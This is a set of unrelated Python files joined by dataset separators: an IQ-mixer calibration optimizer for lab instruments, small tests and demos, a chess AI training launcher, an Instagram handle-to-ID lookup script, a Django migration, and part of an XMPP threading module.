# Instantiate and set markers
self.upp_sb_marker = None
self.lower_sb_marker = None
self.carrier_marker = None
self.set_markers()
self._AWG_DELAY_TIME = awg_delay_time
self._averages = averages
def set_markers(self):
# Configure hd to enable outputs
# self.hd.enable_output(0)
# self.hd.enable_output(1)
# Center frequency at carrier frequency
self.sa.set_center_frequency(self.carrier + self.signal_freq)
self.sa.set_frequency_span(6 * self.signal_freq)
# Marker for upper sideband.
self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)
# define target frequencies
markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
target_freqs = np.array([self.carrier + self.signal_freq, self.carrier - self.signal_freq, self.carrier])
max_deviation = 1e6
for marker, target_freq in zip(markers, target_freqs):
time.sleep(1)
marker.set_freq(target_freq)
#assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequency: {marker_freq / 1e9} GHz"
self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dBm.")
#Set reference level to just above the height of our signal to minimize our noise floor
self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)
if self.plot_traces == True:
self.sa.plot_trace()
def opt_lower_sideband(self):
#gradient descent starting point
phase = self.phase_guess
q = self.q_guess
self.set_phase_and_amp(phase, q)
curr_power = self._average_marker_power(self.lower_sb_marker)
#store power values for every iteration
power_vec = [curr_power]
#initialize step sizes and iteration number
phase_step = self.phase_step
q_step = self.q_step
num_iterations = 0
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_phase_and_amp(phase, q, phase_step, q_step)
phase_new = phase - grad[0] * phase_step
q_new = q - grad[1] * q_step
self.set_phase_and_amp(phase_new, q_new)
new_power = self._average_marker_power(self.lower_sb_marker)
if new_power < curr_power:
curr_power = new_power
phase = phase_new
q = q_new
else:
phase_step = phase_step / 2
q_step = q_step / 2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
else:
self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')
time.sleep(1)
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_phase = phase
self.opt_q = q
self.set_phase_and_amp(self.opt_phase, self.opt_q)
self.lower_sideband_power = self.lower_sb_marker.get_power()
if self.plot_traces == True:
plt.plot(power_vec, label='lower band')
def opt_carrier(self):
#gradient descent starting point
vi = self.dc_i_guess
vq = self.dc_q_guess
self.set_dc_offsets(vi, vq)
curr_power = self._average_marker_power(self.carrier_marker)
#store power values for every iteration
power_vec = [curr_power]
# initialize step sizes and iteration number
vi_step = self.vi_step
vq_step = self.vq_step
num_iterations = 0
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_dc_offsets(vi, vq, vi_step, vq_step)
vi_new = vi - grad[0] * vi_step
vq_new = vq - grad[1] * vq_step
self.set_dc_offsets(vi_new, vq_new)
new_power = self._average_marker_power(self.carrier_marker)
if new_power < curr_power:
curr_power = new_power
vi = vi_new
vq = vq_new
else:
vi_step = vi_step / 1.2
vq_step = vq_step / 1.2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
else:
self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')
time.sleep(1)
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
self.dc_offset_i_opt = vi
self.dc_offset_q_opt = vq
self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt)
self.carrier_power = self.carrier_marker.get_power()
if self.plot_traces == True:
plt.plot(power_vec, label='carrier band')
plt.xlabel('iteration #')
plt.ylabel('power [dBm]')
plt.legend()
def opt(self):
self.opt_lower_sideband()
while self.lower_sideband_power > self.min_power + 7.5:
self.opt_lower_sideband()
self.opt_carrier()
while self.carrier_power > self.min_power + 7.5:
self.dc_i_guess = self.dc_offset_i_opt
self.dc_q_guess = self.dc_offset_q_opt
self.opt_carrier()
#for i in range(10):
# if self.carrier_power - 3.5 > self.lower_sideband_power:
# self.dc_i_guess = self.dc_offset_i_opt
# self.dc_q_guess = self.dc_offset_q_opt
# self.opt_carrier()
time.sleep(1)
self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
def set_phase_and_amp(self, phase, q):
amp_i = 2 * q / (1 + q) * self.a0
amp_q = 2 * self.a0 / (1 + q)
# Set i and q amplitudes
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i)
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q)
# Set phaseshift
self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase)
def set_dc_offsets(self, v1, v2):
# Set I DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1)
# Set Q DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2)
def _average_marker_power(self, marker):
total_sum = 0
for i in range(self._averages):
total_sum = total_sum + marker.get_power()
return total_sum / self._averages
def calc_slope_phase_and_amp(self, phase, q, phase_step, q_step):
self.set_phase_and_amp(phase + phase_step, q)
time.sleep(self._AWG_DELAY_TIME)
phase_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase - phase_step, q)
time.sleep(self._AWG_DELAY_TIME)
phase_m = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q + q_step)
time.sleep(self._AWG_DELAY_TIME)
q_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q - q_step)
time.sleep(self._AWG_DELAY_TIME)
q_m = self._average_marker_power(self.lower_sb_marker)
return([(phase_p - phase_m) / 2, (q_p - q_m) / 2])
def calc_slope_dc_offsets(self, vi, vq, vi_step, vq_step):
self.set_dc_offsets(vi + vi_step, vq)
time.sleep(self._AWG_DELAY_TIME)
vi_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi - vi_step, vq)
time.sleep(self._AWG_DELAY_TIME)
vi_m = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq + vq_step)
time.sleep(self._AWG_DELAY_TIME)
vq_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq - vq_step)
time.sleep(self._AWG_DELAY_TIME)
vq_m = self._average_marker_power(self.carrier_marker)
return([(vi_p - vi_m) / 2, (vq_p - vq_m) / 2])
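# Note on the two calc_slope_* helpers above: each gradient component is a
# symmetric finite difference, (f(x+h) - f(x-h))/2, read off the spectrum-
# analyzer marker. The descent loops scale it by the current step size and
# shrink the step (halving for phase/imbalance, dividing by 1.2 for the DC
# offsets) whenever a candidate move fails to reduce the measured power.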
class IQOptimizer_GD_multifreq(Optimizer):
def __init__(
self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20, min_power=-65,
param_guess=([85, 85, 0.9, 0.9, 0.05, -0.02]), phase_step=5, q_step=0.1, vi_step=0.005, vq_step=0.005,
plot_traces=True, awg_delay_time=0.1, averages=5, HDAWG_ports=[3, 4],
oscillator=[1, 2]):
""" Instantiate IQ optimizer
:param mw_source: instance of microwave source client
:param hd: instance of AWG client
:param sa: instance of spectrum analyzer client
:param carrier: desired carrier frequency (in Hz)
:param signal_freq: desired signal frequencies
:kwarg plot_traces: user decides if displaying power vs. iteration plots is desired
:kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
:kwarg min_power: noise floor (in dBm)
:kwarg param_guess: starting parameters for optimization:
([phase shift 1, phase shift 2,
q := (amp_i/amp_q) amplitude imbalance 1, amplitude imbalance 2,
dc_offset_i, dc_offset_q])
:kwarg phase_step: step size for phase parameter in gradient descent
:kwarg q_step: step size for amplitude imbalance parameter in gradient descent
:kwarg vi_step: step size for dc I offset parameter in gradient descent
:kwarg vq_step: step size for dc Q parameter in gradient descent
:kwarg awg_delay_time: time to wait after setting awg parameters
:kwarg averages: number of measurements averaged for a single power reading
:kwarg HDAWG_ports: which wave ports to use on the HDAWG
:kwarg oscillator: which oscillator to use on the HDAWG
"""
# Set carrier frequency
hd.setd('oscs/{}/freq'.format(oscillator[0] - 1), signal_freq[0])
hd.setd('oscs/{}/freq'.format(oscillator[1] - 1), signal_freq[1])
# assign oscillators to correct outputs
# for first output
hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[1] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format(
int(np.floor((HDAWG_ports[0] - 1) / 2)),
np.mod(HDAWG_ports[0] - 1, 2)),
oscillator[1] - 1)
# for second output
hd.seti('awgs/{}/outputs/{}/modulation/carriers/0/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/1/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[0] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/2/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[1] - 1)
hd.seti('awgs/{}/outputs/{}/modulation/carriers/3/oscselect'.format(
int(np.floor((HDAWG_ports[1] - 1) / 2)),
np.mod(HDAWG_ports[1] - 1, 2)),
oscillator[1] - 1)
self.mw_source = mw_source
self.hd = hd
self.sa = sa
self.carrier = carrier
self.signal_freq = signal_freq
self.max_iterations = max_iterations
self.plot_traces = plot_traces
self.min_power = min_power
self.HDAWG_ports = HDAWG_ports
#Set mw freq
self.mw_source.output_on()
self.mw_source.set_freq(self.carrier)
#Instantiate step sizes
self.phase_step = phase_step
self.q_step = q_step
self.vi_step = vi_step
self.vq_step = vq_step
#Instantiate initial guesses
self.phase_guess = [param_guess[0], param_guess[1]]
self.q_guess = [param_guess[2], param_guess[3]]
self.dc_i_guess = param_guess[4]
self.dc_q_guess = param_guess[5]
# Instantiate params we will optimize
self.opt_phase = np.zeros(2)
self.opt_q = np.zeros(2)
self.amp_q_opt = None
self.amp_i_opt = None
self.dc_offset_i_opt = None
self.dc_offset_q_opt = None
# Instantiate arrays and bounds
self.opt_lower_sideband_pow = float("inf")
self.opt_carrier_pow = float("inf")
# Instantiate and set markers
self.upp_sb_marker = None
self.lower_sb_marker = None
self.carrier_marker = None
# set initial guess parameters
self.set_phase_and_amp(self.phase_guess[0], self.q_guess[0], 0)
self.set_phase_and_amp(self.phase_guess[1], self.q_guess[1], 1)
self.set_dc_offsets(self.dc_i_guess, self.dc_q_guess)
# Enable signal
self.hd.seti('awgs/{}/enable'.format(int(np.floor((HDAWG_ports[1] - 1) / 2))), 1)
self.set_markers(1)
self._AWG_DELAY_TIME = awg_delay_time
self._averages = averages
def set_markers(self, signal):
# signal: 0 or 1, referring to the first or second frequency
# Center frequency at carrier frequency
self.sa.set_center_frequency(self.carrier + self.signal_freq[signal])
self.sa.set_frequency_span(6 * self.signal_freq[signal])
# Marker for upper sideband.
self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)
# define target frequencies
markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
target_freqs = np.array([self.carrier + self.signal_freq[signal], self.carrier - self.signal_freq[signal], self.carrier])
max_deviation = 1e6
for marker, target_freq in zip(markers, target_freqs):
time.sleep(1)
marker.set_freq(target_freq)
#assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequency: {marker_freq / 1e9} GHz"
self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dBm.")
#Set reference level to just above the height of our signal to minimize our noise floor
self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)
if self.plot_traces == True:
self.sa.plot_trace()
def opt_lower_sideband(self, signal):
#set the markers for the sideband we are currently looking at
if self.plot_traces == True:
self.plot_traces = False
self.set_markers(signal)
self.plot_traces = True
else:
self.set_markers(signal)
#gradient descent starting point
phase = self.phase_guess[signal]
q = self.q_guess[signal]
self.set_phase_and_amp(phase, q, signal)
curr_power = self._average_marker_power(self.lower_sb_marker)
#store power values for every iteration
power_vec = [curr_power]
# initialize step sizes and iteration number
num_iterations = 0
phase_step = self.phase_step
q_step = self.q_step
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_phase_and_amp(phase, q, signal, phase_step, q_step)
phase_new = phase - grad[0] * phase_step
q_new = q - grad[1] * q_step
self.set_phase_and_amp(phase_new, q_new, signal)
new_power = self._average_marker_power(self.lower_sb_marker)
if new_power < curr_power:
curr_power = new_power
phase = phase_new
q = q_new
else:
phase_step = phase_step / 2
q_step = q_step / 2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations) + ' iterations')
else:
self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')
time.sleep(1)
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_phase[signal] = phase
self.opt_q[signal] = q
self.set_phase_and_amp(self.opt_phase[signal], self.opt_q[signal], signal)
if self.plot_traces == True:
plt.plot(power_vec, label='lower sideband for frequency {}'.format(signal))
def opt_carrier(self):
#gradient descent starting point
vi = self.dc_i_guess
vq = self.dc_q_guess
self.set_dc_offsets(vi, vq)
curr_power = self._average_marker_power(self.carrier_marker)
#store power values for every iteration
power_vec = [curr_power]
num_iterations = 0
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_dc_offsets(vi, vq)
vi_new = vi - grad[0] * self.vi_step
vq_new = vq - grad[1] * self.vq_step
self.set_dc_offsets(vi_new, vq_new)
new_power = self._average_marker_power(self.carrier_marker)
if new_power < curr_power:
curr_power = new_power
vi = vi_new
vq = vq_new
else:
self.vi_step = self.vi_step / 1.2
self.vq_step = self.vq_step / 1.2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
else:
self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')
time.sleep(1)
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
self.dc_offset_i_opt = vi
self.dc_offset_q_opt = vq
self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt)
if self.plot_traces == True:
plt.plot(power_vec, label='carrier band')
plt.xlabel('iteration #')
plt.ylabel('power [dBm]')
plt.legend()
def opt(self):
self.opt_lower_sideband(0)
self.hd.log.info('Lower sideband power for 1st frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_lower_sideband(1)
self.hd.log.info('Lower sideband power for 2nd frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_carrier()
time.sleep(1)
#self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
def set_phase_and_amp(self, phase, q, signal):
amp_i = 2. * q / (1 + q)
amp_q = 2. * 1 / (1 + q)
dphase_i = np.arccos(amp_i / 2) * 180 / np.pi
dphase_q = np.arccos(amp_q / 2) * 180 / np.pi
# Set i and q amplitudes
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[0] - 1) / 2)),
np.mod(self.HDAWG_ports[0] - 1, 2),
2 * signal), phase + dphase_i)
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[0] - 1) / 2)),
np.mod(self.HDAWG_ports[0] - 1, 2),
2 * signal + 1), phase - dphase_i)
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[1] - 1) / 2)),
np.mod(self.HDAWG_ports[1] - 1, 2),
2 * signal), dphase_q)
self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format(
int(np.floor((self.HDAWG_ports[1] - 1) / 2)),
np.mod(self.HDAWG_ports[1] - 1, 2),
2 * signal + 1), -dphase_q)
def set_dc_offsets(self, v1, v2):
# Set I DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1)
# Set Q DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2)
def _average_marker_power(self, marker):
total_sum = 0
for i in range(self._averages):
total_sum = total_sum + marker.get_power()
return total_sum / self._averages
def calc_slope_phase_and_amp(self, phase, q, signal, phase_step, q_step):
self.set_phase_and_amp(phase + phase_step, q, signal)
phase_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase - phase_step, q, signal)
phase_m = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q + q_step, signal)
q_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q - q_step, signal)
q_m = self._average_marker_power(self.lower_sb_marker)
return([(phase_p - phase_m) / 2, (q_p - q_m) / 2])
def calc_slope_dc_offsets(self, vi, vq):
self.set_dc_offsets(vi + self.vi_step, vq)
vi_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi - self.vi_step, vq)
vi_m = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq + self.vq_step)
vq_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq - self.vq_step)
vq_m = self._average_marker_power(self.carrier_marker)
return([(vi_p - vi_m) / 2, (vq_p - vq_m) / 2])
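# The routines above implement plain two-parameter gradient descent with
# central-difference slopes and step halving on rejection. A self-contained
# toy sketch of the same scheme (the quadratic below stands in for the
# measured sideband power; all names and values are illustrative only):
def _toy_gradient_descent(phase=0.0, q=1.0, phase_step=0.1, q_step=0.1,
                          max_iterations=100, min_power=1e-6):
    def power(p, a):
        # stand-in for _average_marker_power() on the lower-sideband marker
        return (p - 0.3) ** 2 + 2.0 * (a - 1.1) ** 2
    curr_power = power(phase, q)
    for _ in range(max_iterations):
        if curr_power <= min_power:
            break
        # central differences, as in calc_slope_phase_and_amp()
        grad = [(power(phase + phase_step, q) - power(phase - phase_step, q)) / 2,
                (power(phase, q + q_step) - power(phase, q - q_step)) / 2]
        phase_new = phase - grad[0] * phase_step
        q_new = q - grad[1] * q_step
        new_power = power(phase_new, q_new)
        if new_power < curr_power:
            curr_power, phase, q = new_power, phase_new, q_new
        else:
            # reject the step and halve both step sizes, as in opt_lower_sideband()
            phase_step, q_step = phase_step / 2, q_step / 2
    return phase, q, curr_power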
|
nilq/baby-python
|
python
|
import unittest
from runner.robot.zipper import zip_robot
class RobotChanges(unittest.TestCase):
def test_set_new_robot_position(self):
robot1 = {
'part': {
'connects_to': [
{
'part': {
}
}
]
}
}
robot2 = {
'part': {
'connects_to': [
{
'part': {
'display_as': 'colored'
}
}
]
}
}
zip_robot(robot1, robot2)
self.assertEqual(robot1['part']['connects_to'][0]['part']['display_as'], 'colored')
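# zip_robot itself is not shown here; below is a minimal sketch of the
# behavior the test above expects from it (semantics inferred solely from
# this test: walk both robot trees in lockstep and copy keys missing in the
# first robot from the second):
def zip_robot_sketch(dst_holder, src_holder):
    dst, src = dst_holder['part'], src_holder['part']
    for key, value in src.items():
        if key == 'connects_to':
            for dst_child, src_child in zip(dst.get('connects_to', []), value):
                zip_robot_sketch(dst_child, src_child)
        elif key not in dst:
            dst[key] = value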
|
nilq/baby-python
|
python
|
items = [
("Mosh", 100),
("Brad", 90),
("Ahmed", 10),
]
ratings = [item[1] for item in items] # Map alternative
ratings = [item[1] for item in items if item[1] >= 20] # Filter alternative
print(ratings)
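# For comparison, a sketch of the same transforms using the built-in map()
# and filter() functions (equivalent to the comprehensions above):
ratings_mapped = list(map(lambda item: item[1], items))
ratings_filtered = list(map(lambda item: item[1],
                            filter(lambda item: item[1] >= 20, items)))
print(ratings_mapped, ratings_filtered)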
|
nilq/baby-python
|
python
|
import sys
import chessai
def main():
# parse script args
startup_config = sys.argv[1] if len(sys.argv) >= 2 else 'all'
# launch the training according to the specified startup config
if startup_config == 'pretrain_fx': launch_pretrain_fx()
elif startup_config == 'pretrain_ratings': launch_pretrain_ratings()
# TODO: add launching single other trainings here ...
elif startup_config == 'all':
launch_pretrain()
launch_pretrain_ratings()
# TODO: add launching other trainings here ...
else:
raise ValueError('Invalid args! Unknown training startup configuration {}!'.format(startup_config))
def launch_pretrain():
# launch entire pre-training
launch_pretrain_fx()
def launch_pretrain_fx():
params = {
'batch_size': 32,
'learn_rate': 0.2,
'epochs': 30,
'lr_decay_epochs': 3,
'lr_decay_rate': 0.5,
'log_interval': 100,
'total_train_batches': 2400, # TODO: find out the exact value
}
# create a new training session and launch the training
session = chessai.pretrain.DrawGenTrainingSession(params)
session.run_training()
# TODO: launch all other pre-train sessions here, too ...
def launch_pretrain_ratings():
# frozen fx settings
params = {
'batch_size': 32,
'learn_rate': 0.01,
'epochs': 30,
'lr_decay_epochs': 3,
'lr_decay_rate': 0.1,
'is_fx_trainable': False,
'log_interval': 100,
'total_train_batches': 2400, # TODO: find out the exact value
}
# create a new training session and launch the training
session = chessai.pretrain.RatingTrainingSession(params)
session.run_training()
# def get_instance_by_name(fq_classname: str):
# parts = fq_classname.split('.')
# module = ".".join(parts[:-1])
# m = __import__( module )
# for comp in parts[1:]:
# m = getattr(m, comp)
# return m
if __name__ == '__main__':
main()
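# A runnable version of the dynamic-import helper sketched in the comments
# above (a common recipe; the dotted path in the usage note is illustrative):
def get_class_by_name(fq_classname: str):
    parts = fq_classname.split('.')
    module = ".".join(parts[:-1])
    m = __import__(module)
    for comp in parts[1:]:
        m = getattr(m, comp)
    return m
# e.g. get_class_by_name('chessai.pretrain.RatingTrainingSession') returns
# the session class used by launch_pretrain_ratings() above.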
|
nilq/baby-python
|
python
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 26 20:48:30 2016
Convert Instagram handles to numeric IDs, which are needed as inputs
for API queries.
Sample output
ERROR: "not-a-handle" is not available
IG user data
------------
Platform: Instagram
Followers: 394
Handle: thedrawingroomcafe
ID: 1711102403
Full name: The Drawing Room
"""
import csv
import json
import requests
from bs4 import BeautifulSoup
import config_social_handles as config
def GetInstagramUserData(handle):
"""
Load the HTML for a user's profile on www.instagram.com.
Read fields like user's numeric id from the profile HTML.
Args
handle: <type 'str'> Name of Instagram user. If it contains '@'
then it will be removed.
Returns
out_dict: <type 'dict'> Dictionary of user fields and values.
"""
handle = handle.replace("@", "")
base = "http://instagram.com/%s/"
url = base % handle
# access webpage and convert to soup
req = requests.get(url)
soup = BeautifulSoup(req.text, "lxml")
# search for scripts
for script in soup.find_all(u"script", type=u"text/javascript"):
text = script.text
# break when desired script is reached
if "ProfilePage" in text:
break
# extract user profile from script and convert to JSON
json_start = text.find("{")
json_end = text.find(";")
json_string = text[json_start:json_end]
json_data = json.loads(json_string)
# get user data from JSON
# - use [0] as there is only one item
profile = json_data["entry_data"]["ProfilePage"][0]["user"]
# extract user details
out_dict = {}
out_dict["Platform"] = "Instagram"
out_dict["ID"] = profile["id"]
out_dict["Full name"] = profile["full_name"]
out_dict["Handle"] = handle # OR profile['username'] from API
out_dict["Followers"] = profile["followed_by"]["count"]
return out_dict
def main():
user_data = []
IG_users = config.IG_users
for h in IG_users:
try:
IG_user_data = GetInstagramUserData(h)
except ValueError:
IG_user_data = {"Handle": h, "ID": "NOT AVAILABLE"}
print 'ERROR: "%s" is not available' % h
print
user_data.append(IG_user_data)
print "IG user data"
print "------------"
for u in user_data:
for k, v in u.iteritems():
print "%s: %s" % (k, v)
print
out_name = "out_data.csv"
with open(out_name, "w") as csvfile:
fieldnames = ["Platform", "ID", "Handle", "Full name", "Followers"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for user in user_data:
# convert UTF-8 if unicode, otherwise do not convert
for key, value in user.iteritems():
if isinstance(value, unicode):
encoded_value = value.encode("utf-8")
user[key] = encoded_value
writer.writerow(user)
print "Done - %s" % out_name
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.1 on 2020-09-20 01:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('chapters', '0013_auto_20200920_0042'),
]
operations = [
migrations.RemoveField(
model_name='orderablecontent',
name='content_type',
),
migrations.RemoveField(
model_name='orderablecontent',
name='object_id',
),
]
|
nilq/baby-python
|
python
|
#
# (C) Copyright 2011 Jacek Konieczny <jajcus@jajcus.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
"""I/O Handling classes
This module has a purpose similar to :std:`asyncore` from the base library, but
should be more usable, especially for PyXMPP.
Also, these interfaces should allow building application not only in
asynchronous event loop model, but also threaded model.
"""
__docformat__ = "restructuredtext en"
import time
import threading
import logging
import sys
import queue
import inspect
from .interfaces import MainLoop, HandlerReady, PrepareAgain
from .interfaces import IOHandler, QUIT, EventHandler, TimeoutHandler
from .events import EventDispatcher
from ..settings import XMPPSettings
from .wait import wait_for_read, wait_for_write
logger = logging.getLogger("pyxmpp2.mainloop.threads")
class IOThread(object):
"""Base class for `ReadingThread` and `WrittingThread`.
:Ivariables:
- `name`: thread name (for debugging)
- `io_handler`: the I/O handler object to poll
- `thread`: the actual thread object
- `exc_info`: this will hold exception information tuple for the
last exception raised in the thread.
- `exc_queue`: queue to put all exceptions raised in the thread.
:Types:
- `name`: `str`
- `io_handler`: `IOHandler`
- `thread`: :std:`threading.Thread`
- `exc_info`: (type, value, traceback) tuple
"""
def __init__(self, settings, io_handler, name, daemon = True,
exc_queue = None):
# pylint: disable=R0913
self.settings = settings if settings else XMPPSettings()
self.name = name
self.io_handler = io_handler
self.thread = threading.Thread(name = name, target = self._run)
self.thread.daemon = daemon
self.exc_info = None
self.exc_queue = exc_queue
self._quit = False
def start(self):
"""Start the thread.
"""
self.thread.start()
def is_alive(self):
"""Check if the thread is alive."""
return self.thread.is_alive()
def stop(self):
"""Request the thread to stop."""
self._quit = True
def join(self, timeout):
"""Join the thread (wait until it stops)."""
return self.thread.join(timeout)
def _run(self):
"""The thread function. Calls `self.run()` in loop and if it raises an
exception, stores it in self.exc_queue. If `exc_queue` is None
the exception will abort the thread.
"""
logger.debug("{0}: entering thread".format(self.name))
while True:
try:
self.run()
except Exception: # pylint: disable-msg=W0703
self.exc_info = sys.exc_info()
logger.debug("exception in the {0!r} thread:"
.format(self.name), exc_info = self.exc_info)
if self.exc_queue:
self.exc_queue.put( (self, self.exc_info) )
continue
else:
logger.debug("{0}: aborting thread".format(self.name))
return
except:
logger.debug("{0}: aborting thread".format(self.name))
return
break
logger.debug("{0}: exiting thread".format(self.name))
def run(self):
"""The thread function."""
raise NotImplementedError
class ReadingThread(IOThread):
"""A thread reading from io_handler.
This thread will be also the one to call the `IOHandler.prepare` method
until HandlerReady is returned.
It can be used (together with `WrittingThread`) instead of
a main loop."""
def __init__(self, settings, io_handler, name = None, daemon = True,
exc_queue = None):
# pylint: disable=R0913
if name is None:
name = "{0!r} reader".format(io_handler)
IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue)
def run(self):
"""The thread function.
First, call the handler's 'prepare' method until it returns
`HandlerReady` then loop waiting for the socket input and calling
'handle_read' on the handler.
"""
# pylint: disable-msg=R0912
interval = self.settings["poll_interval"]
prepared = False
timeout = 0.1
while not self._quit:
if not prepared:
logger.debug("{0}: preparing handler: {1!r}".format(
